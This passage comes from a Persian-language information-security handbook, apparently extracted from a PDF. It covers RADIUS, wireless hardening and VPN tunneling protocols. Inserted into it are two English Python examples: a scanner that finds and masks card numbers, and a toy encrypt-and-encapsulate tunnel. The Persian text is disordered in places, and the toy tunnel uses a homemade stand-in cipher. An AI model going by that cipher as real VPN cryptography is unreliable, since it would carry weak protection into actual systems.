RADIUS ﻣﻲﺗﻮﺍﻧﺪ ﺁﻧﺮﺍ ﻓﺮﺍﻫﻢ ﻛﻨﺪ ،ﺍﺭﺗﺒﺎﻁ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﻣﻴﺎﻥ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ- ﻫــﺎﻱ ﺭﺍﻩ ﺩﻭﺭ ﻭ ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﺓ RADIUSﺍﺳــﺖ .ﺷــﺒﻜﻪﻫــﺎﻱ ﺧﺼﻮﺻﻲ ﻣﺠﺎﺯﻱ )VPNﻫـﺎ( ﻧﻴﺰ ﺑﺼﻮﺭﺕ ﻣﺸﺎﺑﻪ ﻛﺎﺭ ﻣـﻲﻛﻨﻨـﺪ ،ﺍﻣـﺎ ﺑﺠﺎﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﻣﻴﺎﻥ ﻣﻴﺰﺑﺎﻥ ﺭﺍﻩ ﺩﻭﺭ ﻭ ﺷﺒﻜﻪ ،ﻣﻴﺎﻥ ﺩﻭ ﺷـﺒﻜﻪ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻣﻲﺳﺎﺯﻧﺪ .ﭘﺲ ﺍﺯ ﺍﻳﻨﻜﻪ ﺭﺍﻳﺎﻧﺔ ﺭﺍﻩ ﺩﻭﺭ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﺷﺪ ﻭ ﺑﻮﺳﻴﻠﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ RADIUSﺑﻪ ﺷـﺒﻜﺔ ﺩﺍﺧﻠـﻲ ﻣﺘـﺼﻞ ﮔﺸﺖ ،ﺑﮕﻮﻧﻪﺍﻱ ﻋﻤﻞ ﻣﻲﻛﻨﺪ ﻛـﻪ ﮔـﻮﻳﻲ ﺍﺯ ﻧﻈـﺮ ﻓﻴﺰﻳﻜـﻲ ﺩﺭ ﻛﻨـﺎﺭ ﺷــﺒﻜﻪ ﻭ ﻣﺘــﺼﻞ ﺑــﻪ ﺁﻥ ﺍﺳــﺖ .ﺑــﻪ ﻋﺒــﺎﺭﺕ ﺩﻳﮕــﺮ ،ﺭﻣﺰﮔــﺬﺍﺭﻱ ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﺓ RADIUSﺗﻨﻬــﺎ ﻣﻴــﺎﻥ ﺁﻥ ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﻩ ﻭ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ،ﻭ ﻧﻪ ﺩﺭ ﺗﻤﺎﻡ ﺷﺒﻜﻪ. ،Rick Fleming ۲۱۴ﻗﺎﺋﻢ ﻣﻘﺎﻡ ﺭﺋﻴﺲ ﺩﺍﻳﺮﺓ ﺍﻣﻨﻴﺖ ﺷﺮﻛﺖ Digital Defense 215 Dual Homed ﻛﺮﺩﻥ ﻣﻘﺼﺪ ﺗﺮﺍﻓﻴـﻚ ﺧـﺎﺭﺝﺷـﺪﻩ ﺍﺯ ﺷـﺒﻜﺔ ﺑـﻲﺳـﻴﻢ ﻣﻲ ﺗﻮﺍﻥ ﺍﺯ ﻗﻮﺍﻧﻴﻦ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺳﺘﻔﺎﺩﻩ ﻛـﺮﺩ .ﺍﻃﻤﻴﻨـﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻣﻴﺎﻥ ﺗﻤﺎﻡ ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳـﻲ ﺑﻲﺳﻴﻢ ﻭ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ ﻳﺎ ﺍﻳﻨﺘﺮﻧﺖ ﻭﺟﻮﺩ ﺩﺍﺭﺩ. .۱۵ﺳﺮﻭﻳﺲ DHCPﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ ﻭ ﺑـﺮﺍﻱ ﻛﺎﺭﺗﻬـﺎﻱ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺧﻮﺩ ﺍﺯ ﺁﺩﺭﺱ IPﺛﺎﺑـﺖ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ. ﻫﻤﭽﻨﻴﻦ ﻣﺤﺪﻭﺩﺓ ﭘﻴﺶ ﻓﺮﺽ ﺁﺩﺭﺱ IPﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺭﺍ ﺍﺯ ﺁﻧﭽﻪ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﻩ ﺗﻌﻴﻴﻦ ﻛﺮﺩﻩ ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ. 
.۱۶ﺗﻨﻬﺎ ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳﻲ ﻗﺎﺑﻞ ﺍﺭﺗﻘﺎ ﺧﺮﻳﺪﺍﺭﻱ ﻛﻨﻴﺪ .ﻫﻤﻴـﺸﻪ ﭘﻴﺸﺮﻓﺘﻬﺎﻳﻲ ﺩﺭ ﺍﻣﻨﻴﺖ ﺍﻳﻨﮕﻮﻧﻪ ﺍﺑﺰﺍﺭﻫﺎ ﺍﻳﺠﺎﺩ ﻣﻲﺷـﻮﺩ ،ﻭ ﻟﺬﺍ ﺑﺎﻳﺪ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ ﻛﻪ ﻫﻤﻮﺍﺭﻩ ﺧﻮﺍﻫﻴﺪ ﺗﻮﺍﻧﺴﺖ ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳﻲ ﺧﻮﺩ ﺭﺍ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻳﺪ. ﺍﻃﻼﻋﺎﺕ ﺩﻳﮕﺮﻱ ﺩﺭ ﺧﺼﻮﺹ VPN ﺑﺮﺍﻱ ﻣﺤﺎﻓﻈـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺳﻴـﺴﺘﻤﻬﺎﻳﻲ ﻛـﻪ ﺍﺯ ﻫﺮﻳـﻚ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﻣﺬﻛﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ،ﺑﺎﻳﺪ VPNﺭﺍﻩ ﺍﻧـﺪﺍﺯﻱ ﻛﻨﻴـﺪ، ﺑﻄﻮﺭﻳﻜﻪ ﻫﻤﺔ gatewayﻫﺎ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ ﺍﻳـﻦ VPNﺑﺎﺷﻨﺪ ﻭ ﻫﺮ ﻛﺎﺭﺑﺮ ﻫﻨﮕﺎﻡ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺷﺒﻜﻪﻫﺎﻱ ﻣـﻮﺭﺩ ﺍﻃﻤﻴﻨﺎﻥ ،ﺍﺯ ﺍﻳﻦ ﻣﻜـﺎﻧﻴﺰﻡ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨـﺪ .ﺍﺳﺎﺳـﹰﺎ VPNﻳـﻚ ﺍﺗﺼﺎﻝ ﺧﺼﻮﺻﻲ ﻣﻴﺎﻥ ﺩﻭ ﺩﺳﺘﮕﺎﻩ ﺍﺳﺖ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﻪ ﺭﺍ ﺩﺭ ﻳﻚ ﺷـﺒﻜﺔ ﻋﻤـﻮﻣﻲ ﻭ ﺑـﻪﺍﺷـﺘﺮﺍﻙ ﮔﺬﺍﺷـﺘﻪﺷـﺪﻩ ﻣﺜـﻞ ﺍﻳﻨﺘﺮﻧﺖ ﺑـﺼﻮﺭﺕ ﺍﻣـﻦ ﺍﻧﺘﻘـﺎﻝ ﻣـﻲﺩﻫـﺪ .ﻓﻨـﺎﻭﺭﻱ VPNﺑـﻪ ﺳﺎﺯﻣﺎﻥ ﺍﻣﻜﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺧﺪﻣﺎﺕ ﺷﺒﻜﺔ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍﻩ ﺩﻭﺭ ،ﻭﺍﺣﺪﻫﺎ ،ﻭ ﺷﺮﻛﺘﻬﺎﻱ ﻫﻤﻜﺎﺭ ﺑﺼﻮﺭﺕ ﺍﻳﻤﻦ ﻭ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺩﺳﺘﺮﺱ ﻗﺮﺍﺭ ﺩﻫﺪ .ﺑﻪ ﻋﺒﺎﺭﺕ ﺩﻳﮕﺮ VPNﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﺑﻪ ﻳﻚ ﺷﺒﻜﺔ ﺷﺒﻴﻪﺳﺎﺯﻱﺷﺪﺓ ﺧـﺼﻮﺻﻲ ٢١٦WANﺗﺒـﺪﻳﻞ ﻣﻲﻛﻨﺪ VPN .ﻫﻤﭽﻨﻴﻦ ﺑـﻪ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍﻩ ﺩﻭﺭ ﺍﻳـﻦ ﺍﻣﻜـﺎﻥ ﺭﺍ ﻣﻲﺩﻫﺪ ﻛـﻪ ﺑﺘﻮﺍﻧﻨـﺪ ﺑـﻪ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ ﺷـﺮﻛﺖ ﺧـﻮﺩ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ. ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻌﻨﻮﺍﻥ ﻳـﻚ ﺷـﺒﻜﺔ ﺍﺭﺗﺒـﺎﻃﻲ ﻭﺳـﻴﻊ ﺧﺼﻮﺻﻲ ،ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺎﻳﺪ ﺑـﺮ ﺩﻭ ﻣـﺎﻧﻊ ﺍﺻـﻠﻲ ﻓـﺎﺋﻖ ﺁﻳﻨـﺪ .ﺍﻭﻝ ﺍﻳﻨﻜﻪ ﺷﺒﻜﻪﻫﺎ ﻏﺎﻟﺒﹰﺎ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﻣﺨﺘﻠﻔـﻲ ﺍﺭﺗﺒـﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻣﻲﻛﻨﻨﺪ ،ﺍﻣﺎ VPNﺭﺍﻫﻲ ﺑﺮﺍﻱ ﻋﺒﻮﺭ ﭘﺮﻭﺗﻜﻠﻬﺎﻳﻲ ﻏﻴﺮ ﺍﺯ IPﺍﺯ ﻳﻚ ﺷﺒﻜﻪ ﺑﻪ ﺷﺒﻜﺔ ﺩﻳﮕﺮ ﻓﺮﺍﻫﻢ ﻣـﻲﺳـﺎﺯﺩ .ﺩﻭﻡ ﺍﻳﻨﻜـﻪ ﺑﺴﺘﻪﻫﺎﻱ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﺑـﺼﻮﺭﺕ ﻣـﺘﻦﺳـﺎﺩﻩ ﺍﻧﺘﻘـﺎﻝ 216 Wide Area Network ٢١٣ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻣﻲﻳﺎﺑﻨﺪ ،ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻫـﺮﻛﺲ ﻛـﻪ ﺑﺘﻮﺍﻧـﺪ ﺗﺮﺍﻓﻴـﻚ ﺍﻳﻨﺘﺮﻧـﺖ ﺭﺍ ﺑﺒﻴﻨﺪ ،ﺧﻮﺍﻫﺪ ﺗﻮﺍﻧـﺴﺖ ﺍﻃﻼﻋـﺎﺕ ﻣﻮﺟـﻮﺩ ﺩﺭ ﺑـﺴﺘﻪﻫـﺎ ﺭﺍ ﻧﻴـﺰ ﻼ ﺑﺨﻮﺍﻧﺪ .ﺍﻳﻦ ﻳﻚ ﻣﺸﻜﻞ ﺑـﺰﺭﮒ ﺍﺳـﺖ ،ﺑﺨـﺼﻮﺹ ﺍﮔـﺮ ﻣـﺜ ﹰ ﺑﺎﻧﻜﻬــﺎ ﺑﺨﻮﺍﻫﻨــﺪ ﺍﺯ ﺍﻳﻨﺘﺮﻧــﺖ ﺑــﺮﺍﻱ ﺗﺒــﺎﺩﻝ ﺩﺍﺩﻩﻫــﺎﻱ ﻣﻬــﻢ ﻭ ﻣﺤﺮﻣﺎﻧﺔ ﺗﺠﺎﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ VPN .ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻜـﺎﻧﻴﺰﻣﻲ ﺑﻪ ﻧﺎﻡ ﺗﻮﻧﻞ ٢١٧ﺑﺮ ﺍﻳﻦ ﻣﺸﻜﻼﺕ ﻏﻠﺒﻪ ﻣﻲﻛﻨﺪ .ﺩﺭ ﺍﻳﻦ ﻣﻜـﺎﻧﻴﺰﻡ ﺩﺍﺩﻩ ﻫﺎ ﺑﺠﺎﻱ ﺍﺭﺳﺎﻝﺷﺪﻥ ﺑﺼﻮﺭﺕ ﻋﺎﺩﻱ ،ﺑﺮﺍﻱ ﺍﻣﻨﻴـﺖ ﺑﻴـﺸﺘﺮ ﺍﺑﺘﺪﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﻧﺪ ،ﺩﺭﻭﻥ ﻳﻚ ﺑﺴﺘﺔ IPﻗﺮﺍﺭ ﻣﻲ ﮔﻴﺮﻧـﺪ، ﻭ ﺳﭙﺲ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺭﺳﺎﻝ ﻣﻲﮔﺮﺩﻧﺪ. 217 Tunneling ۲۱۸ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ IETFﺩﺭﺣﺎﻝ ﺍﺻﻼﺡ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ VPNﺍﺳـﺖ ﺗـﺎ IPSecﺭﺍ ﺍﻳﻤﻦﺗﺮ ﻭ ﻧﻴﺰ ﺑﺎ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﺎﻫﻮﺍﺭﻩﺍﻱ ﺳﺎﺯﮔﺎﺭ ﻛﻨﺪ. 
Point-to-Point Protocol Link Layer Point-to-Point Tunneling Layer 2 Tunneling Protocol ۲۲۳ﻣﻘﺎﻟﺔ Karen Bannasﺑﺎ ﻋﻨﻮﺍﻥ " "Safe Passageﺩﺭ ﻣﺠﻠﺔ ،PC Magazineﻫﻔــﺖ ﺷــﺮﻛﺖ ﺍﺭﺍﺋــﻪﺩﻫﻨــﺪﺓ VPNﺭﺍ ﺑــﺮﺍﻱ ﻣﺤﺼﻮﻻﺕ ﻣﻨﺎﺳﺐ ﺟﻬﺖ ﻛﺎﺭﺑﺮﺩ ﺩﺭ ﺷﺮﻛﺘﻬﺎﻱ ﻣﺘﻮﺳﻂ ﺑـﺎ ﺑﻮﺩﺟـﻪﺍﻱ ﺣﺪﻭﺩ ﺩﻩ ﻫﺰﺍﺭ ﺩﻻﺭ ﻛﻪ ﺑﻪ VPNﺑﺮﺍﻱ ﺍﺭﺗﺒﺎﻁ ﻣﻴﺎﻥ ﺩﻓﺘـﺮ ﻣﺮﻛـﺰﻱ ﻭ ﺷﻌﺒﻪﻫﺎ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ: http://www.pcmag.com/ print_article/0,3048,a%3D12352,00.asp 219 220 221 222 ﺑﺨﺶ ﺳﻮﻡ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺤـﺼﻮﻻﺕ ﻣﺜـﻞ ﻣﺤـﺼﻮﻻﺕ ،Cisco ،Nokia ،Checkpoint ،Nortelﻭ Microsoftﺩﺍﺭﺍﻱ ﻓﻨــــــﺎﻭﺭﻱ VPNﺍﻳﻤﻦ ﻭ ﻣﻨﺎﺳﺐ ﻫﺴﺘﻨﺪ ٢١٨ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﻧﻘﺎﻁ ﻣﺨﺘﻠﻒ ﺷﺒﻜﻪ ﻗﺮﺍﺭ ﮔﻴﺮﺩ .ﺍﮔﺮﭼﻪ VPNﺍﺯ ﻣﺤﺘـﻮﺍﻱ ﺩﺍﺩﻩﻫـﺎﻱ ﺗﺒـﺎﺩﻟﻲ ﺭﻭﻱ ﺷﺒﻜﻪ ﺣﻔﺎﻇﺖ ﻣﻲﻛﻨﺪ ،ﺍﻣـﺎ ﺑـﺴﺘﻪ ﺑـﻪ ﺍﻳﻨﻜـﻪ ﭼﮕﻮﻧـﻪ ﺩﺭ ﺷـﺒﻜﻪ ﻗـﺮﺍﺭ ﮔﺮﻓﺘـﻪ ﺑﺎﺷــﺪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻧﺘﻮﺍﻧـﺪ ﺍﺯ ﺩﺳﺘﺮﺳــﻲ ﻏﻴﺮﻣﺠﺎﺯ ﺍﺯ ﺑﻴﺮﻭﻥ ﺷﺒﻜﻪ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﺎﻳـﺪ .ﺑـﻪ ﻋﺒـﺎﺭﺕ ﺩﻳﮕـﺮ ﻫﺮﭼﻨﺪ ﻛﺎﺭﺑﺮ ﻏﻴﺮﻣﺠﺎﺯ ﺑﺨﺎﻃﺮ ﻭﺟﻮﺩ VPNﻧﻤﻲﺗﻮﺍﻧﺪ ﻣﺤﺘـﻮﺍﻱ ﺩﺍﺩﻩﻫﺎ ﺭﺍ ﺑﺒﻴﻨﺪ ،ﺍﻣﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﻤﭽﻨﺎﻥ ﺑﺘﻮﺍﻧﺪ ﺑﻪ ﻣﻨﺎﺑﻊ ﺷﺒﻜﻪ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ ﻭ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﺭﺍ ﺑﮕﻮﻧـﻪﺍﻱ ﺗﻐﻴﻴـﺮ ﺩﻫـﺪ ﻛـﻪ ﻇﺮﻓﻴﺖ ﺷﺒﻜﻪ ﺳﺮﺭﻳﺰ ﺷﻮﺩ ﻭ ﻋﻠﻴﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺠﺎﺯ ﺣﻤﻠﺔ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺍﻧﺠـﺎﻡ ﮔﻴـﺮﺩ .ﻛﻨﺘـﺮﻝ ﺩﺳﺘﺮﺳـﻲ ،ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻭ ﺭﻣﺰﮔــﺬﺍﺭﻱ ﺍﺯ ﻋﻨﺎﺻــﺮ ﺣﻴــﺎﺗﻲ ﻳــﻚ ﺍﺗــﺼﺎﻝ ﺍﻣــﻦ ﻫــﺴﺘﻨﺪ .ﺍﺯ ﭘﺮﻭﺗﻜﻞ ﻧﻘﻄﻪ ﺑﻪ ﻧﻘﻄﻪ ) ٢١٩(PPPﺑﺮﺍﻱ ﻣﺪﺕ ﻣﺪﻳـﺪﻱ ﺑﻌﻨـﻮﺍﻥ ﭘﺮﻭﺗﻜﻞ ﺟﻬﺎﻧﻲ ﻻﻳﺔ ﺍﺗﺼﺎﻝ ٢٢٠ﺟﻬﺖ ﺍﻳﺠﺎﺩ ﺗﻮﻧﻞ ﻣﻴﺎﻥ ﺍﺑﺰﺍﺭﻫـﺎ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﺪ؛ ﺍﻣﺎ ﺩﺭ ﺳﺎﻟﻬﺎﻱ ﺍﺧﻴﺮ ﭘﺮﻭﺗﻜﻞ ﺗﻮﻧـﻞ ٢٢٢ ﻧﻘﻄﻪ ﺑﻪ ﻧﻘﻄﻪ )٢٢١(PPTPﻭ ﭘﺮﻭﺗﻜﻞ ﺗﻮﻧﻞ ﻻﻳـﺔ ﺩﻭ )(L2TP ٢٢٣ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺗﺮﺟﻴﺢ ﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ. 
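The credit-card checklist in this chapter asks that temporary files never hold unencrypted card data and that card data cached on a web server be removed once the transaction is complete. The following Python scanner is an added example, not part of the handbook, showing one way to check for that: it looks for card-number-shaped digit strings, confirms them with the Luhn checksum, and reports or masks them. The sample log, the function names and the directory layout are assumptions made for the illustration.

```python
import os
import re
from typing import Dict, List, NamedTuple

# Constructed sample: a debug log left in a web server's temp directory.
# The card numbers are publicly documented test numbers, not real accounts.
SAMPLE_LOG = """\
2003-09-10 12:00:01 checkout start session=ab12
2003-09-10 12:00:02 DEBUG pan=4111111111111111 exp=12/05
2003-09-10 12:00:03 order id 1234567890123456 accepted
2003-09-10 12:00:04 retry card 5555-5555-5555-4444 ok
2003-09-10 12:00:05 amex 3782 822463 10005 declined
"""

# Candidate shapes: an unbroken run of 13-19 digits, or the 4-4-4-4 and
# 4-6-5 groupings printed on cards, separated by spaces or hyphens.
CANDIDATE = re.compile(
    r"(?<!\d)(?:\d{13,19}"
    r"|\d{4}(?:[ -]\d{4}){3}"
    r"|\d{4}[ -]\d{6}[ -]\d{5})(?!\d)"
)


class Finding(NamedTuple):
    line: int      # 1-based line number
    masked: str    # card number with all but the last four digits hidden


def luhn_ok(digits: str) -> bool:
    """True if the digit string passes the Luhn checksum used by card numbers."""
    if len(set(digits)) == 1:          # 0000... passes Luhn but is not a card
        return False
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:                 # double every second digit from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def strip_separators(text: str) -> str:
    return text.replace(" ", "").replace("-", "")


def mask(candidate: str) -> str:
    digits = strip_separators(candidate)
    return "*" * (len(digits) - 4) + digits[-4:]


def find_pans(text: str) -> List[Finding]:
    """Return every Luhn-valid card number found in the text, masked."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        for match in CANDIDATE.finditer(line):
            if luhn_ok(strip_separators(match.group())):
                findings.append(Finding(number, mask(match.group())))
    return findings


def redact(text: str) -> str:
    """Return the text with every Luhn-valid card number masked in place."""
    def replace(match):
        value = match.group()
        return mask(value) if luhn_ok(strip_separators(value)) else value
    return CANDIDATE.sub(replace, text)


def scan_tree(root: str) -> Dict[str, List[Finding]]:
    """Scan every file under root; return only the files that contain hits."""
    report = {}
    for directory, _subdirs, files in os.walk(root):
        for name in files:
            path = os.path.join(directory, name)
            try:
                # latin-1 decodes any byte sequence, so binary files are safe
                with open(path, encoding="latin-1") as handle:
                    hits = find_pans(handle.read())
            except OSError:
                continue               # unreadable file: skip, do not abort
            if hits:
                report[path] = hits
    return report


if __name__ == "__main__":
    for finding in find_pans(SAMPLE_LOG):
        print(f"line {finding.line}: {finding.masked}")
```

A clean result from such a scan does not prove the data is gone from the disk; the checklist's separate point about unrecoverable deletion still applies.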
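The tunneling mechanism described in the VPN section (encrypt the data, place it inside an IP packet, send it across the Internet) can be made concrete with a short added example, which is not code from the handbook or from any VPN product. It is not the IPSec, PPTP or L2TP wire format: the keystream built from HMAC-SHA256 stands in for the cipher a real VPN would use, protocol number 253 is the value reserved for experiments, and the keys, gateway addresses and inner frame are constructed for the illustration.

```python
import hashlib
import hmac
import os
import socket
import struct

PROTO_EXPERIMENTAL = 253     # IP protocol number reserved for experimentation
NONCE_LEN = 16
TAG_LEN = 32
IP_HEADER_LEN = 20

# Constructed demo values (assumptions, not from the handbook).
ENC_KEY = hashlib.sha256(b"demo encryption key").digest()
MAC_KEY = hashlib.sha256(b"demo authentication key").digest()
INNER_FRAME = b"\xff\xffNON-IP FRAME: TRANSFER amount=1000 account=DEMO"


class TunnelError(Exception):
    """Raised when a received packet must be dropped."""


def _checksum(header: bytes) -> int:
    """Internet checksum (one's-complement sum of 16-bit words)."""
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Stand-in stream cipher: HMAC-SHA256 over nonce || block counter."""
    out = b""
    counter = 0
    while len(out) < length:
        block = nonce + struct.pack("!Q", counter)
        out += hmac.new(key, block, hashlib.sha256).digest()
        counter += 1
    return out[:length]


def _xor(data: bytes, stream: bytes) -> bytes:
    return bytes(a ^ b for a, b in zip(data, stream))


def encapsulate(inner: bytes, enc_key: bytes, mac_key: bytes,
                src_gateway: str, dst_gateway: str) -> bytes:
    """Encrypt and authenticate the inner frame, then wrap it in an IPv4 packet."""
    nonce = os.urandom(NONCE_LEN)
    ciphertext = _xor(inner, _keystream(enc_key, nonce, len(inner)))
    tag = hmac.new(mac_key, nonce + ciphertext, hashlib.sha256).digest()
    payload = nonce + ciphertext + tag
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, IP_HEADER_LEN + len(payload),
                         0, 0, 64, PROTO_EXPERIMENTAL, 0,
                         socket.inet_aton(src_gateway),
                         socket.inet_aton(dst_gateway))
    header = header[:10] + struct.pack("!H", _checksum(header)) + header[12:]
    return header + payload


def outer_view(packet: bytes) -> dict:
    """What anyone watching the Internet path can still read."""
    return {"src": socket.inet_ntoa(packet[12:16]),
            "dst": socket.inet_ntoa(packet[16:20]),
            "protocol": packet[9],
            "length": struct.unpack("!H", packet[2:4])[0]}


def decapsulate(packet: bytes, enc_key: bytes, mac_key: bytes) -> bytes:
    """Verify the outer header and the tag; return the inner frame or raise."""
    if len(packet) < IP_HEADER_LEN + NONCE_LEN + TAG_LEN:
        raise TunnelError("packet too short")
    header, payload = packet[:IP_HEADER_LEN], packet[IP_HEADER_LEN:]
    if header[0] != 0x45 or _checksum(header) != 0:
        raise TunnelError("bad outer header")
    view = outer_view(packet)
    if view["protocol"] != PROTO_EXPERIMENTAL or view["length"] != len(packet):
        raise TunnelError("not a tunnel packet")
    nonce = payload[:NONCE_LEN]
    ciphertext = payload[NONCE_LEN:-TAG_LEN]
    tag = payload[-TAG_LEN:]
    expected = hmac.new(mac_key, nonce + ciphertext, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):   # authenticate before decrypting
        raise TunnelError("authentication failed")
    return _xor(ciphertext, _keystream(enc_key, nonce, len(ciphertext)))


if __name__ == "__main__":
    pkt = encapsulate(INNER_FRAME, ENC_KEY, MAC_KEY, "192.0.2.1", "198.51.100.1")
    print(outer_view(pkt))
    print(decapsulate(pkt, ENC_KEY, MAC_KEY))
```

The outer header stays readable and the receiving gateway still has to process every packet that arrives, which is why the section lists access control and authentication alongside encryption.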
٢١٥ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻓﺼﻞ ﺳﻴﺰﺩﻫﻢ ﮔﻔﺘﮕﻮﻫﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﭘﻴﺮﺍﻣﻮﻥ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ ﻛﻠﻴﺎﺕ ﺳﻤﻴﻨﺎﺭ ﺟﻬﺎﻧﻲ ﺳﺎﻝ :۲۰۰۲ ٢٢٥ ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﻩ ﺩﺭ ﺣﻮﺯﺓ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺟﻠﺴﻪ ﺑﺎ ﻣﻘﺪﻣـﻪﺍﻱ ﺑـﺮ ﻣﺨـﺎﻃﺮﺓ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ٢٢٦ﺁﻏـﺎﺯ ﺷـﺪ ﻭ ﻣﻘﺎﻻﺕ ﺑﻪ ﺗﺒﺪﻳﻞ ﺷﺪﻥ "ﺷﺒﻜﻪﻫﺎﻱ ﺑﺴﺘﻪ" ﺑﻪ "ﺷﺒﻜﻪﻫـﺎﻱ ﺑـﺎﺯ" ﺩﺭ ﺧﻼﻝ ﺩﻩ ﺳـﺎﻝ ﺍﺧﻴـﺮ ﺍﺷـﺎﺭﻩ ﺩﺍﺷـﺘﻨﺪ .ﺩﺭ ﺷـﺒﻜﻪﻫـﺎﻱ ﺑـﺎﺯ، ﻭﺍﺑﺴﺘﮕﻲ ﺑﻪ ﻗﺎﺑﻠﻴﺘﻬـﺎﻳﻲ ﻣﺜـﻞ SSLﻛـﻪ ﺍﺧﻴـﺮﹰﺍ ﺍﻟﮕـﻮﺭﻳﺘﻢ ﺁﻥ ﺷﻜﺴﺘﻪ ﺷﺪﻩ ﺑﻮﺩ ﺑﺎﻋﺚ 